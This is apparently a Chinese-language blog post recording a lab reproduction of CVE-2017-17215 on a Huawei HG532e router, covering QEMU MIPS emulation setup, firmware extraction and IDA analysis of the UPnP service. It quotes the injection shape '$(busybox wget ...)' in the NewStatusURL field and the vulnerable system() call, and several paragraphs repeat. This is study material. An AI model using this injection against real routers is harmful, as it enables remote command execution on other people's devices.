<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="1.复现CVE-2017-17215学习路由器漏洞分析然后再复现CVE-2018-17068、CVE-2018-5767、CVE-2016-5367 华为已经发了漏洞公告，固件已经升级到HG532eV100R001C02B017_upgrade_main.bin。从论坛里找到了带漏洞版本件，HG532eV100R001C02B015_upgrade_main.bin。 附上下载链接 1https:">
<meta property="og:type" content="article">
<meta property="og:title" content="路由器实验复现（1）hg532e">
<meta property="og:url" content="https://devil0x.github.io/2019/11/19/路由器实验复现（1）hg532e/index.html">
<meta property="og:site_name" content="devil0x菜鸟">
<meta property="og:description" content="1.复现CVE-2017-17215学习路由器漏洞分析然后再复现CVE-2018-17068、CVE-2018-5767、CVE-2016-5367 华为已经发了漏洞公告，固件已经升级到HG532eV100R001C02B017_upgrade_main.bin。从论坛里找到了带漏洞版本件，HG532eV100R001C02B015_upgrade_main.bin。 附上下载链接 1https:">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://image.3001.net/images/20180111/15156587081163.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180111/1515658972939.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180111/15156592945471.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180111/1515660657639.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180111/15156609745022.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180111/15156613687279.png!small">
<meta property="og:image" content="http://pico0ziv8.bkt.clouddn.com/18-12-3/29942034.jpg">
<meta property="og:image" content="https://image.3001.net/images/20180111/15156686001122.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180111/15156685477408.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180111/15156662004916.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180111/15156663101284.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180111/15156664767325.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180111/15156682779054.png!small">
<meta property="og:image" content="https://image.3001.net/images/20180112/15157334268937.png!small">
<meta property="og:image" content="http://pico0ziv8.bkt.clouddn.com/18-12-3/41289211.jpg">
<meta property="og:image" content="http://pico0ziv8.bkt.clouddn.com/18-12-3/72288694.jpg">
<meta property="og:image" content="http://pico0ziv8.bkt.clouddn.com/18-12-3/78152986.jpg">
<meta property="og:image" content="https://image.3001.net/images/20180112/15157334268937.png!small">
<meta property="og:image" content="http://pico0ziv8.bkt.clouddn.com/18-12-3/55458895.jpg">
<meta property="og:image" content="http://pico0ziv8.bkt.clouddn.com/18-12-8/82814804.jpg">
<meta property="og:updated_time" content="2019-11-19T06:15:50.450Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="路由器实验复现（1）hg532e">
<meta name="twitter:description" content="1.复现CVE-2017-17215学习路由器漏洞分析然后再复现CVE-2018-17068、CVE-2018-5767、CVE-2016-5367 华为已经发了漏洞公告，固件已经升级到HG532eV100R001C02B017_upgrade_main.bin。从论坛里找到了带漏洞版本件，HG532eV100R001C02B015_upgrade_main.bin。 附上下载链接 1https:">
<meta name="twitter:image" content="https://image.3001.net/images/20180111/15156587081163.png!small">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://devil0x.github.io/2019/11/19/路由器实验复现（1）hg532e/">





  <title>路由器实验复现（1）hg532e | devil0x菜鸟</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">devil0x菜鸟</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://devil0x.github.io/2019/11/19/路由器实验复现（1）hg532e/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="devil0x">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="devil0x菜鸟">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">路由器实验复现（1）hg532e</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-11-19T14:15:48+08:00">
                2019-11-19
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="1-复现CVE-2017-17215学习路由器漏洞分析"><a href="#1-复现CVE-2017-17215学习路由器漏洞分析" class="headerlink" title="1.复现CVE-2017-17215学习路由器漏洞分析"></a>1.复现CVE-2017-17215学习路由器漏洞分析</h2><p>然后再复现CVE-2018-17068、CVE-2018-5767、CVE-2016-5367</p>
<p>华为已经发了漏洞公告，固件已经升级到HG532eV100R001C02B017_upgrade_main.bin。从论坛里找到了带漏洞版本件，HG532eV100R001C02B015_upgrade_main.bin。</p>
<p>附上下载链接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://ia601506.us.archive.org/22/items/RouterHG532e/router%20HG532e.rar</span><br></pre></td></tr></table></figure>
<h2 id="2-先补一下这个漏洞的详情"><a href="#2-先补一下这个漏洞的详情" class="headerlink" title="2.先补一下这个漏洞的详情"></a>2.先补一下这个漏洞的详情</h2><p><strong>零日（CVE-2017-17215）</strong></p>
<p>华为家庭网关采用通用即插即用（UPnP）协议。通过TR-064技术报告标准，该协议广泛用于嵌入式设备中，无缝连接并简化家庭和企业环境中网络的实施。</p>
<p>TR-064专为本地网络配置而设计。例如，它允许工程师从内部网络中实现基本设备配置，固件升级等。</p>
<p>但在这种情况下，华为设备中的TR-064实现通过端口37215（UPnP）暴露给WAN。</p>
<p>从查看设备的UPnP描述，可以看出它支持名为<code>DeviceUpgrade</code>的服务类型。据推测，该服务通过向“/ ctrlt / DeviceUpgrade_1”（称为controlURL）发送请求来执行固件升级操作，并使用名为“NewStatusURL”和“NewDownloadURL”的两个元素执行。</p>
<p>该漏洞允许远程管理员通过在NewStatusURL和NewDownloadURL中注入shell元字符“$（）”来执行任意命令，如下所示。</p>
<p>Upnp：</p>
<h3 id="1-分析环境是ubuntu-16-04"><a href="#1-分析环境是ubuntu-16-04" class="headerlink" title="1.分析环境是ubuntu 16.04."></a>1.分析环境是ubuntu 16.04.</h3><p>先用binwalk 解压一下：</p>
<h3 id="2-配置复现环境"><a href="#2-配置复现环境" class="headerlink" title="2. 配置复现环境"></a>2. 配置复现环境</h3><p>安装 qemu：实现mips处理器构架模拟环境。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install qemu </span><br><span class="line"></span><br><span class="line">sudo apt-get install qemu-user-static</span><br><span class="line"></span><br><span class="line">sudo apt-get install qemu-system</span><br></pre></td></tr></table></figure>
<p>安装网络配置工具：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install bridge-utils uml-utilities</span><br></pre></td></tr></table></figure>
<p>安装网络配置工具：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install bridge-utils uml-utilities</span><br></pre></td></tr></table></figure>
<p>修改 ubuntu主机网络配置，将ubuntu主机系统中的网络接口配置文件 nano /etc/network/interfaces 修改为如下内容：</p>
<p><a href="https://image.3001.net/images/20180111/15156587081163.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/15156587081163.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"># ubuntu 16.04的系统用ens33代替eth0</span><br><span class="line">auto lo</span><br><span class="line">iface lo inet loopback</span><br><span class="line"> </span><br><span class="line">auto eth0</span><br><span class="line">iface eth0 inet manual</span><br><span class="line">up ifconfig eth0 0.0.0.0 up</span><br><span class="line"> </span><br><span class="line">auto br0</span><br><span class="line">iface br0 inet dhcp</span><br><span class="line">bridge_ports eth0</span><br><span class="line">bridge_maxwait 0</span><br></pre></td></tr></table></figure>
<p>创建QEMU的网络接口启动脚本（nano /etc/qemu-ifup）并保存为如下内容：</p>
<p>如果之前就已经有内容的话，直接在基础添加即可</p>
<p><a href="https://image.3001.net/images/20180111/1515658972939.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/1515658972939.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">echo &quot;Executing /etc/qemu-ifup&quot;</span><br><span class="line">echo &quot;Bringing $1 for bridged mode...&quot;</span><br><span class="line">sudo /sbin/ifconfig $1 0.0.0.0 promisc up</span><br><span class="line">echo &quot;Adding $1 to br0...&quot;</span><br><span class="line">sudo /sbin/brctl addif br0 $1</span><br><span class="line">sleep 3</span><br></pre></td></tr></table></figure>
<p>赋予文件/etc/qemu-ifup 可执行权限：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo chmod a+x /etc/qemu-ifup</span><br></pre></td></tr></table></figure>
<p>重启网络使所有的配置生效：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo /etc/init.d/networking restart</span><br></pre></td></tr></table></figure>
<p>关闭ens33，启动桥连网络br0</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo ifdown eth0</span><br><span class="line">sudo ifdown br0</span><br><span class="line">sudo ifup br0</span><br></pre></td></tr></table></figure>
<h3 id="3-debian-org-gt-aurel32-qemu-mips-下载对应的debian-mips-qemu镜像"><a href="#3-debian-org-gt-aurel32-qemu-mips-下载对应的debian-mips-qemu镜像" class="headerlink" title="3.debian.org/&gt;~aurel32/qemu/mips/下载对应的debian mips qemu镜像"></a>3.debian.org/&gt;~aurel32/qemu/mips/下载对应的debian mips qemu镜像</h3><p>我下载的是debian_squeeze_mips_standard.qcow2和vmlinux-2.6.32-5-4kc-malta。</p>
<p>从<a href="https://people.debian.org/" target="_blank" rel="noopener">https://people.debian.org/</a>~aurel32/qemu/mips/下载对应的debian mips qemu镜像</p>
<p><a href="https://image.3001.net/images/20180111/15156592945471.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/15156592945471.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<p>然后启动镜像</p>
<figure class="highlight plain"><figcaption><span>qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append &quot;root=/dev/sda1 console=tty0&quot; -net nic,macaddr=00:16:3e:00:00:01 -net tap</span><br><span class="line"></span><br><span class="line">sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append &quot;root=/dev/sda1 console=tty0&quot; -nographic</span><br></pre></td></tr></table></figure>
<p>我下载的是debian_squeeze_mips_standard.qcow2和vmlinux-2.6.32-5-4kc-malta。</p>
<p>好的，假如一切顺利，可以看到一个qemu虚拟机，</p>
<p>用root/root登录进去:</p>
<p><a href="https://image.3001.net/images/20180111/1515660657639.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/1515660657639.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<p>发现网络不通，ifconfig -a 看一下发现网络接口为eth1：</p>
<p><a href="https://image.3001.net/images/20180111/15156609745022.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/15156609745022.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<p>将nano /etc/network/interfaces 文件中的eth0改为eth1：</p>
<p><a href="https://image.3001.net/images/20180111/15156613687279.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/15156613687279.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<p>再用ifup eth1  将eth1启起来，运气好的话此时网络已经好了。</p>
<h1 id="（这部分是抄的，直接借鉴的）"><a href="#（这部分是抄的，直接借鉴的）" class="headerlink" title="（这部分是抄的，直接借鉴的）"></a><code>（这部分是抄的，直接借鉴的）</code></h1><h3 id="4-环境搭建好，进行实际操作"><a href="#4-环境搭建好，进行实际操作" class="headerlink" title="4. 环境搭建好，进行实际操作"></a>4. 环境搭建好，进行实际操作</h3><p>在已经登陆的qemu里输入,查看ip地址</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ifconfig -a</span><br></pre></td></tr></table></figure>
<p><img src="http://pico0ziv8.bkt.clouddn.com/18-12-3/29942034.jpg" alt></p>
<p>直接操作虚拟机显然比较麻烦，在ubuntu上搞个SSH 连进来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh root@192.168.127.141</span><br></pre></td></tr></table></figure>
<p>再次输入密码即可</p>
<p>将之前解压的固件包拷贝到虚拟机里面：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scp -r ./squashfs-root  root@192.168.127.141:/root/</span><br></pre></td></tr></table></figure>
<p>完成搭建路由器固件运行的环境。</p>
<p>找到固件所在的位置，想直接执行下upnp这个文件，报错,缺少相应的so文件造成。</p>
<p><a href="https://image.3001.net/images/20180111/15156686001122.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/15156686001122.png!small" alt="图片.png"></a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chroot /root/squashfs-root /bin/sh</span><br></pre></td></tr></table></figure>
<p>来切换根目录到路由器文件系统，执行成功：</p>
<p><a href="https://image.3001.net/images/20180111/15156685477408.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/15156685477408.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a><br>可是发包过去仍然失败，应该是并没有启动监听服务</p>
<p>那找下端口37215</p>
<p><a href="https://image.3001.net/images/20180111/15156662004916.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/15156662004916.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<p>端口号只出现在mic文件内，看下文件内容：</p>
<p><a href="https://image.3001.net/images/20180111/15156663101284.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/15156663101284.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<p>看字符串像是一个跟网络服务相关的文件，试下运行一下：</p>
<p><a href="https://image.3001.net/images/20180111/15156664767325.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/15156664767325.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<p>看起来像是对了，</p>
<p>ubuntu上nc -vlp 80 监听一下端口，跑一下exp，80端口收到路由器发来的wget 请求包。</p>
<p><a href="https://image.3001.net/images/20180111/15156682779054.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180111/15156682779054.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<p>4.简单分析：</p>
<p>分析一下upnp中的关键代码:</p>
<p><a href="https://image.3001.net/images/20180112/15157334268937.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180112/15157334268937.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<p>根据上面payload图，newstatusurl这个节点值为 <newstatusurl>$(busybox wget -g xxxx ;xx;xx)</newstatusurl></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">snprintf(a0,0x400,&quot;upg -g -U %s -t &apos;1 Firmware Upgrade Image&apos; -c upnp -r %s -d -&quot;,a3)</span><br></pre></td></tr></table></figure>
<p>其中a0是拷贝的源字符串的地址，同时a0又是system 调用的第一个参数。所以最后会执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">system（a0）</span><br></pre></td></tr></table></figure>
<p>如果看完整篇文章想上手试一下路由器漏洞的话，不要忘了当初你是为什么放弃的.</p>
<h2 id="5-甩进ida分析"><a href="#5-甩进ida分析" class="headerlink" title="5.甩进ida分析"></a>5.甩进ida分析</h2><h5 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h5><p>根据 Check Point 的报告<a href="https://research.checkpoint.com/good-zero-day-skiddie/" target="_blank" rel="noopener">【1】</a>，该远程命令执行漏洞的漏洞点位于 UPnP 服务中。</p>
<p>UPnP 是由“通用即插即用论坛”（UPnP™ Forum）推广的一套网络协议。该协议的目标是使家庭网络（数据共享、通信和娱乐）和公司网络中的各种设备能够相互无缝连接，并简化相关网络的实现。</p>
<p>直接将固件中负责 UPnP 服务的 upnp 程序扔到 IDA。</p>
<p>用IDA直接打开 /HG532eV100R001C01B020_upgrade_packet.bin.extracted/squashfs-root/bin</p>
<p>1.通过字符串 <code>NewStatusURL</code> 对漏洞点进行定位。直接在ida中的空白处按入空格，由流程图模式改为汇编代码模式，按shift+f12打开String Windows窗口，再按入alt+t，然后直接搜索<code>NewStatus</code>来定位该漏洞位置。</p>
<p><img src="http://pico0ziv8.bkt.clouddn.com/18-12-3/41289211.jpg" alt></p>
<p>2.跟踪数据的引用地址</p>
<p><img src="http://pico0ziv8.bkt.clouddn.com/18-12-3/72288694.jpg" alt></p>
<p>3.找到漏洞点如下</p>
<p><img src="http://pico0ziv8.bkt.clouddn.com/18-12-3/78152986.jpg" alt></p>
<h1 id="2-学习IDA-Pro"><a href="#2-学习IDA-Pro" class="headerlink" title="2.学习IDA Pro"></a>2.学习IDA Pro</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ps：先去学习一下ida pro的用法。</span><br><span class="line">我的ida pro链接，直接拖到ubuntu点解idap即可运行</span><br><span class="line">不过64位需要安装一下依赖</span><br><span class="line"></span><br><span class="line">sudo dpkg --add-architecture i386</span><br><span class="line">sudo apt-get update</span><br><span class="line">sudo apt-get install libc6-i686:i386 libexpat1:i386 libffi6:i386 libfontconfig1:i386 libfreetype6:i386 libgcc1:i386 libglib2.0-0:i386 libice6:i386 libpcre3:i386 libpng12-0:i386 libsm6:i386 libstdc++6:i386 libuuid1:i386 libx11-6:i386 libxau6:i386 libxcb1:i386 libxdmcp6:i386 libxext6:i386 libxrender1:i386 zlib1g:i386 libx11-xcb1:i386 libdbus-1-3:i386 libxi6:i386 libsm6:i386 libcurl3:i386</span><br></pre></td></tr></table></figure>
<p>分析一下upnp中的关键代码:</p>
<p><a href="https://image.3001.net/images/20180112/15157334268937.png" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20180112/15157334268937.png!small" alt="通过CVE-2017-17215学习路由器漏洞分析"></a></p>
<p>根据上面payload图，newstatusurl这个节点值为 <newstatusurl>$(busybox wget -g xxxx ;xx;xx)</newstatusurl></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">snprintf(a0,0x400,&quot;upg -g -U %s -t &apos;1 Firmware Upgrade Image&apos; -c upnp -r %s -d -&quot;,a3)</span><br></pre></td></tr></table></figure>
<p>其中a0是拷贝的源字符串的地址，同时a0又是system 调用的第一个参数。所以最后会执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">system（a0）</span><br></pre></td></tr></table></figure>
<p>(借的图片Orz)</p>
<h3 id="IDA-Pro基本知识"><a href="#IDA-Pro基本知识" class="headerlink" title="IDA Pro基本知识"></a>IDA Pro基本知识</h3><h5 id="1-基本常识"><a href="#1-基本常识" class="headerlink" title="1. 基本常识"></a>1. 基本常识</h5><p><img src="http://pico0ziv8.bkt.clouddn.com/18-12-3/55458895.jpg" alt></p>
<p>红色窗口为函数列表，一个文件被反编译后所有的函数列表都可以在此窗格中显示；</p>
<p>蓝色窗口为汇编代码区，双击每个函数，可以看到对应函数对应的汇编代码段；</p>
<p>黑色窗口为输出窗口，文件反汇编过程中的信息都可以在此窗口中看到。</p>
<h3 id="3-安装buildroot的坑"><a href="#3-安装buildroot的坑" class="headerlink" title="3.安装buildroot的坑"></a>3.安装buildroot的坑</h3><p><img src="http://pico0ziv8.bkt.clouddn.com/18-12-8/82814804.jpg" alt></p>
<p>安装buildroot的时候不要把安装包下载到win10，然后在复制到ubuntu，容易导致hash值发生变化，引发报错。。。。。</p>
<p>啥系统软件，在啥系统内下载</p>
<h4 id="1-MIPS交叉编译环境的搭建（Buildroot）"><a href="#1-MIPS交叉编译环境的搭建（Buildroot）" class="headerlink" title="1. MIPS交叉编译环境的搭建（Buildroot）"></a>1. MIPS交叉编译环境的搭建（Buildroot）</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">1.github的方式</span><br><span class="line"></span><br><span class="line"># 安装依赖库</span><br><span class="line">$ sudo apt-get update</span><br><span class="line">$ sudo apt-get install libncurses5-dev patch</span><br><span class="line"> </span><br><span class="line"># 下载源码</span><br><span class="line">$ git clone https://github.com/buildroot/buildroot.git</span><br><span class="line"> </span><br><span class="line"># 进行编译的配置</span><br><span class="line">$ cd buildroot</span><br><span class="line">$ make clean</span><br></pre></td></tr></table></figure>
<h3 id="3-firmware-mod-kit工具的安装"><a href="#3-firmware-mod-kit工具的安装" class="headerlink" title="3. firmware-mod-kit工具的安装"></a>3. firmware-mod-kit工具的安装</h3><p>firmware-mod-kit工具的功能和binwalk工具的类似，其实firmware-mod-kit工具在功能上有调用binwalk工具提供的功能以及其他的固件解包工具的整合。下载firmware-mod-kit工具的源码进入到src目录下就能够看到firmware-mod-kit工具整合了那些固件提取和文件系统解压的工具。firmware-mod-kit工具的功能有固件文件的解包和打包、固件提取文件系统的解压和压缩、DD-WRT Web Pages的修改等，在每个整合的固件分析工具的源码文件夹里都有相关的使用说明。</p>
<h4 id="1-安装依赖"><a href="#1-安装依赖" class="headerlink" title="1.安装依赖"></a>1.安装依赖</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">For Ubuntu 需要安装的依赖库文件</span><br><span class="line">sudo apt-get install git build-essential zlib1g-dev liblzma-dev python-magic</span><br></pre></td></tr></table></figure>
<h4 id="4-下载安装"><a href="#4-下载安装" class="headerlink" title="4. 下载安装"></a>4. 下载安装</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/mirror/firmware-mod-kit.git</span><br><span class="line"> </span><br><span class="line"># 进入源码目录</span><br><span class="line">cd firmware-mod-kit/src</span><br><span class="line"> </span><br><span class="line"># 执行configure文件生成Makefile文件然后make编译生成可执行文件</span><br><span class="line">./configure &amp;&amp; make</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/14/pwn工具配置与使用，并且自动切换gdb脚本/" rel="next" title="pwn工具配置与使用，并且自动切换gdb脚本">
                <i class="fa fa-chevron-left"></i> pwn工具配置与使用，并且自动切换gdb脚本
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">devil0x</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
